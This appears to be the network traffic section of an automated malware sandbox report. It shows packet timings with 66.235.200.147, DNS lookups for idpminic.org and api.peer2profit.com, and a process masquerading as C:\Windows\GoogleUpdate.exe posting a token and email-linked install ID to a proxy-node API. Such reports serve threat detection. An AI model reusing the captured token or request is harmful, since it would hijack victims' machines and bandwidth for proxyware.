Jan 4, 2023 16:47:45.501595020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501619101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501619101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501646042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501648903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501665115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501671076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501691103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501697063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501712084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501722097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501733065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501748085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501754999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501775026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501796007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501812935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501846075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.501853943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501874924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501912117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.501936913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502007008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502007961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502028942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502048969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502063990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502068043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502089024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502105951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502108097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502126932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502150059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502171040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502193928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502213955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502233028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502238035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502257109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502270937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502302885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502306938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502331972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502346039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502351999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502392054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502417088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502444983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502460957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502468109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502480984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502489090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502511978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502545118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502547026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502568007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502588034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502593994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502609968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502631903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502641916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502655029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502675056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502707005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502724886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502744913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502778053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502799988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502804041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502820969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502846956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502867937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502887964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502907991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502940893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502948999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.502959967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.502995014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503004074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503031969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503057957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503057957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503081083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503099918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503099918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503122091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503154039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503194094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503210068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503210068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503215075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503235102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503273964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503283024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503304005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503324032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503328085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503344059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503364086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503380060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503417015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503438950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503458977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503478050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503484011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503498077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503519058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503582001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503602028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503603935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503657103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503665924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503690958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503710985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503715038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503747940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503770113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503770113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503789902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503818989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503829956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503844023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503866911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503870010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503905058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.503942966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503963947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.503983021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504003048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504023075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504025936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.504085064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504106045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504128933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504153967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504179955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504231930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504276037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504302025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504327059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504350901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504371881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504395008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504420042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504441977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504467010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504487991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504512072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504532099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504550934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504570961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504590034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504610062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504873991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504897118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504924059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504951000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504977942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.504998922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505007029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505036116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505058050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505065918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505086899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505112886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505137920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505162954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505187988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505213976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505239964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505268097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505295038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505320072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505345106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505363941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505383968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505402088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505422115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505439997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505467892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505497932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505517006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505531073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505558968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505620003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505759001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505779982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505794048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505814075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505827904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505848885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505872011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505877018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505897045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505918026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505922079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505960941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.505965948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.505984068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506004095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506005049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506025076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506043911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506055117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506062984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506083965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506095886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506098986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506110907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506146908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506150007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506171942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506202936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506208897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506225109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506243944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506244898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506267071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506268978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506294012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506303072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506314993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506336927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506551027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506571054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506603956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506604910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506630898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506639957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506663084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506675959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506700993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506711006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506724119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506732941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506755114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506774902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506778002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506794930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506815910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506818056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506836891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506846905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506855965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506875992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506886959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506895065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506915092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506932974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506953955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506956100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506972075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.506977081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506997108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.506999969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507016897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507025003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507036924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507056952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507067919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507075071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507095098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507112980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507132053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507251024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507251024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507251024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507251024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507591009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507611990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507632971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507653952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507656097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507677078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507677078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507697105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507719040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507719994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507735014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507742882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507761002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507781029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507786036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507802963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507822990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507853031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507853031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507853031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507874966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507884026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507894993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507906914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507915020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507930994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507935047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507956028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507960081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.507987022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.507987976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.508016109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.508024931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.508044004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.508045912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.508071899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.508095026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.508095980 CET	49696	80	192.168.2.4	66.235.200.147

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 4, 2023 16:47:37.217681885 CET	192.168.2.4	8.8.8.8	0x503d	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Jan 4, 2023 16:48:17.302658081 CET	192.168.2.4	8.8.8.8	0xfa08	Standard query (0)	api.peer2profit.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 4, 2023 16:47:37.360837936 CET	8.8.8.8	192.168.2.4	0x503d	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Jan 4, 2023 16:47:37.360837936 CET	8.8.8.8	192.168.2.4	0x503d	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Jan 4, 2023 16:48:17.329133034 CET	8.8.8.8	192.168.2.4	0xfa08	No error (0)	api.peer2profit.com		172.66.40.196	A (IP address)	IN (0x0001)	false
Jan 4, 2023 16:48:17.329133034 CET	8.8.8.8	192.168.2.4	0xfa08	No error (0)	api.peer2profit.com		172.66.43.60	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.peer2profit.com

109.107.173.210

www.idpminic.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49697	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	Direction	Data
2023-01-04 15:48:18 UTC	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:18 UTC	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
